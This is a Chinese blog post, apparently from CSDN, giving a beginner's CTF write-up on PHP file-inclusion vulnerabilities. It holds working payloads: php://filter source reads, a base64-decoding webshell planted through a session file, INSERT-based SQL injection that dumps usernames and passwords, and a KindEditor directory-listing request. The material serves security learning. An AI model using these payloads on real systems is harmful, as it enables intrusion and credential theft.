CTF之萌新web学习(文件包含)

最新推荐文章于 2024-04-09 14:14:40 发布
最新推荐文章于 2024-04-09 14:14:40 发布
阅读量650 收藏 1
点赞数
分类专栏: ctf 刷题 文章标签: 安全 php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmth666/article/details/104616201
版权
ctf 同时被 2 个专栏收录
22 篇文章 2 订阅
订阅专栏
刷题
19 篇文章 2 订阅
订阅专栏

文章目录


在这里插入图片描述

文件包含漏洞

在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。

相关函数

  1. include()
  2. include_once()
  3. require()
  4. require_once()

include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。

而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。

远程文件包含

PHP的配置文件allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。

allow_url_fopen = On(是否允许打开远程文件)
allow_url_include = On(是否允许include/require远程文件)

伪协议

php://filter
可以以base64的编码读取文件
?file=php://filter/read=convert.base64-encode/resource=index.php
php:input
php://input可以读取没有处理过的POST数据
利用条件:

  1. allow_url_include=On
  2. 对allow_url_fopen不作要求

利用

包含的时候,不一定要包含php文件(即非可执行php文件)类似于:

  1. a.phps
  2. a.xxx
  3. a.jpg

只要里头包含一块完整的php代码即可,例如一个a.txt文件,内容为

<?php phpinfo(); ?>

session

PHP默认生成的session文件往往存放在/tmp目录下,可以在包含session这里进行php语句
实验环境:i春秋web题:notebooke
在这里插入图片描述
进入界面很明显的文件包含,module为文件后缀,file为文件名,包含robots.txt试试
在这里插入图片描述
发现不存在,多试试发现
在这里插入图片描述
module只识别后缀为php的文件,并且发现有php1nFo.php ,说明很可能有session
注册用户名为

<?php $_GET[a](base64_decode($_GET[s]));?>

由于会过滤关键语句,使用base64编码的传输上去的
在这里插入图片描述
并且发现session的值为PHPSESSID:fr906uqdh424sm2gr7nddjfoq1
查看phpinfo()
在这里插入图片描述
这里是一个坑,session并不在这个文件夹,这题有个提示tips: 文件包含phpinfo是不是有新的发现
在这里插入图片描述
好了,接下来就是访问这个文件触发php函数,文件在
../../../tem/SESS/sess_fr906uqdh424sm2gr7nddjfoq1存在,最后引用语句cat flag

在这里插入图片描述

综合性例题

实验环境:i春秋web题:Blog
在这里插入图片描述
进入页面发现有注册,登录,先注册试试
在这里插入图片描述
发现有一个写入的功能
在这里插入图片描述
这里猜测是不是运用了数据库的insert功能
在这里插入图片描述
猜测有三列,但无法确认,由于insert还可以插入下一段,继续尝试
在这里插入图片描述
显示success,但发现博客内容没有显示,说明第一个和最后一个不可控,导致无法插入,只能更改第2,3个,继续尝试,闭合第三个title=111&content=1111','a'),( 'a' , database() , 'a
在这里插入图片描述
成功执行了database(),注入即可
title=111&content=1111','a'),( 'a' , (select group_concat(table_name) from information_schema.tables where table_schema=database()),'a

在这里插入图片描述
title=111&content=1111','a'),( 'a' , (select group_concat(column_name) from information_schema.columns where table_name='users') , 'a
在这里插入图片描述
title=111&content=1111','a'),( 'a' , (select group_concat(username) from users) , 'a

title=111&content=1111','a'),( 'a' , (select group_concat(password) from users) , 'a
在这里插入图片描述
成功爆出来了admin和password
在这里插入图片描述
md5解密为melody123,进入管理员
在这里插入图片描述
发现一个文件包含,尝试文件位置是可以找到flag的
在这里插入图片描述
base64解码即可
在这里插入图片描述
这里其实有个kindeditor漏洞,可以利用
在这里插入图片描述
KindEditor上传解析漏洞、列目录、内容漏洞
尝试利用漏洞
http://d22d4241757d46d8934e4f38ee42661837b5d72e845240ff.changame.ichunqiu.com/kindeditor/php/file_manager_json.php?path=
在这里插入图片描述
发现可行,就可以列出所有文件名了
在这里插入图片描述

可参考文章:Web安全实战系列:文件包含漏洞

Bmth
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFweb学习记录 -- 文件包含
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
CTF WEB文件包含
weixin_30949361的博客
09-29 541
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
网络安全CTF ——web_文件包含(1),从消息中间件看分布式系统的多种套路
最新发布
zhuceyigecsdn的博客
04-09 539
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
CTFshow web入门——文件包含
小元砸的博客
02-07 3409
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTF-WEB-文件包含
2301_79721580的博客
11-08 260
最近跟着大师傅的课程学习ctfweb,随想记录下知识点,便于日后的复习,难免会有错误,望师傅们能多加指点,今天进入文件包含学习。1.文件包含的本质1>代码复用2>并行开发3>模块化4>增加移植性2.include和eval的异同同:都不是函数,都是语言结构,无法通过配置文件函数禁用来禁用。异:include:后面接一个路径表示执行php文件的路径,读取路径中文件中内容后,然后执行里面的php代码eval:后面接php代码,表示要执行的php代码3.php常见文件包含函数、语言结构。
CG CTF-Web-文件包含
feng的博客
09-05 294
WP 由于题目比较简单,不扯什么心路历程了,直接上WP。 首先看到题目就知道是文件包含,即使题目没有明说,点击链接。 发现了?file=show.php。 也需要知道这大概率就是文件包含了。我因为之前有个题目看到这样的没有察觉,导致跑偏了。既然错过了一次,就要吸取经验。 知道了文件包含,就利用文件包含相关的知识点去解题。 我首先用了php://input,结果出了Oh, on。我以为是过滤了php:,所以我换了一种协议: data://text/plain,<?php system("ls /")
CTF工具之御剑后台扫描(web).rar
09-16
3. **文件包含漏洞探测**:检查网站是否允许恶意的文件包含操作,可能导致代码执行或信息泄露。 4. **SQL注入测试**:利用各种SQL注入攻击技术,探测数据库的漏洞,如盲注、时间延迟注入等。 5. **XSS跨站脚本扫描...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
CTF工具之antsword(web).rar
09-16
antsword的核心功能在于帮助参赛者发现并利用Web应用中的漏洞,比如SQL注入、XSS跨站脚本攻击、文件包含漏洞等。 antsword的主要特点包括: 1. **多平台支持**:antsword支持Windows、Linux和Mac OS等多个操作系统...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
网络安全CTF ——web_文件包含
weixin_63274653的博客
01-27 385
通过查看php.ini文件,发现allow_url_fopen 和 allow_url_include都是打开的,所以可以判断是远程文件包含。这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag。指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件。直接读取目标机上的Flag文件,通常可以通过操纵变量去读取。文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含。通过给定的URL查看源码。
CTF---Web---文件包含---09--etc/shadow
qq_22160557的博客
07-28 472
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTFWeb文件包含—09–etc/shadow 一、题目描述 题目: 文件包含 链接:http://172.16.15.216/stage/12/ 二、解题步骤 1、 构造payload 读取linux的/etc/shadow文件,用#截断目录 http://172.16.15.216/stage/12/show.php?file=…/…/…/…/etc/shadow# 三、总结 1、/etc/shadow
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1504
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTFWeb文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 529
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTFSHOW】web入门文件包含
7ruth0hn的博客
07-23 1532
CTFSHOW】web入门文件包含 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 没有过滤,一开始想直接包含flag.php,发现一片空白。使用php://filter伪协议读取flag.php内容,进行base64解码得到flag。 payload: ?file=php://filter/convert.base6
CTF---Web---文件包含---03---require_once
qq_22160557的博客
07-28 1631
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、审计源代码3、构造payload4、查表名5、查列名6、查字段名总结 前言 题目分类: CTFWeb文件包含—03—require_once 一、题目描述 题目: b-11-未写完的网站 二、解题步骤 1、御剑扫描 Step1:用御剑扫描后,得到web.zip,为网站源代码。 2、审计源代码 Step2:题目逻辑: info.php页面中的role变量未经过addslashes过滤,经过将传入的$tem参数赋值为…/edit_info时,re
CTF---Web---文件包含---10---三种本地包含
qq_22160557的博客
07-29 829
文章目录前言一、题目描述二、逻辑解析三、解题方法1、将flag.php读入变量hello中2、 eval存在命令执行漏洞,用hello构造payload3、构造伪协议四、总结 前言 题目分类: CTFWeb文件包含—10—三种本地包含 一、题目描述 题目: 文件包含 二、逻辑解析 <?php include "flag.php"; //可知flag在flag.php里, $a = @$_REQUEST['hello']; //$_REQUEST[]支持get
web入门 文件包含
博客地址 www.sec0nd.top
04-13 298
文章目录web78web79web80web87web88 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 最简单的php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php 再base64解码可得flag web79 &lt
ctf.show萌新web8
07-12
你好!对于 CTF 中的 web8 题目,我可以给你一些建议。首先,我们需要先了解题目的要求和背景。然后,我们可以尝试分析题目给出的代码或者功能,寻找可能存在的漏洞或者攻击点。 在解决 web8 题目时,一些常见的攻击点可能包括: 1. SQL 注入:尝试在用户输入中插入恶意的 SQL 语句,从而获取敏感信息或者绕过验证。 2. 文件包含:检查是否存在可以包含任意文件的漏洞,尝试读取敏感文件或者执行恶意代码。 3. 文件上传:检查是否存在可以上传任意文件的漏洞,尝试上传恶意文件并执行。 4. XSS(跨站脚本攻击):尝试在用户输入中插入恶意脚本,从而获取用户的敏感信息或者执行恶意操作。 当尝试解决 web8 题目时,你可以先尝试输入一些常见的测试向量,如单引号、双引号、特殊字符等,以便检测是否存在 SQL 注入或者 XSS 漏洞。如果有输入过滤或者验证机制,你可以尝试绕过它们,尝试构造恶意输入。 总的来说,解决 CTF 中的 web8 题目需要一定的经验和技巧,你可以通过学习相关的 web 安全知识和攻击技术来提升自己的能力。希望这些提示对你有所帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值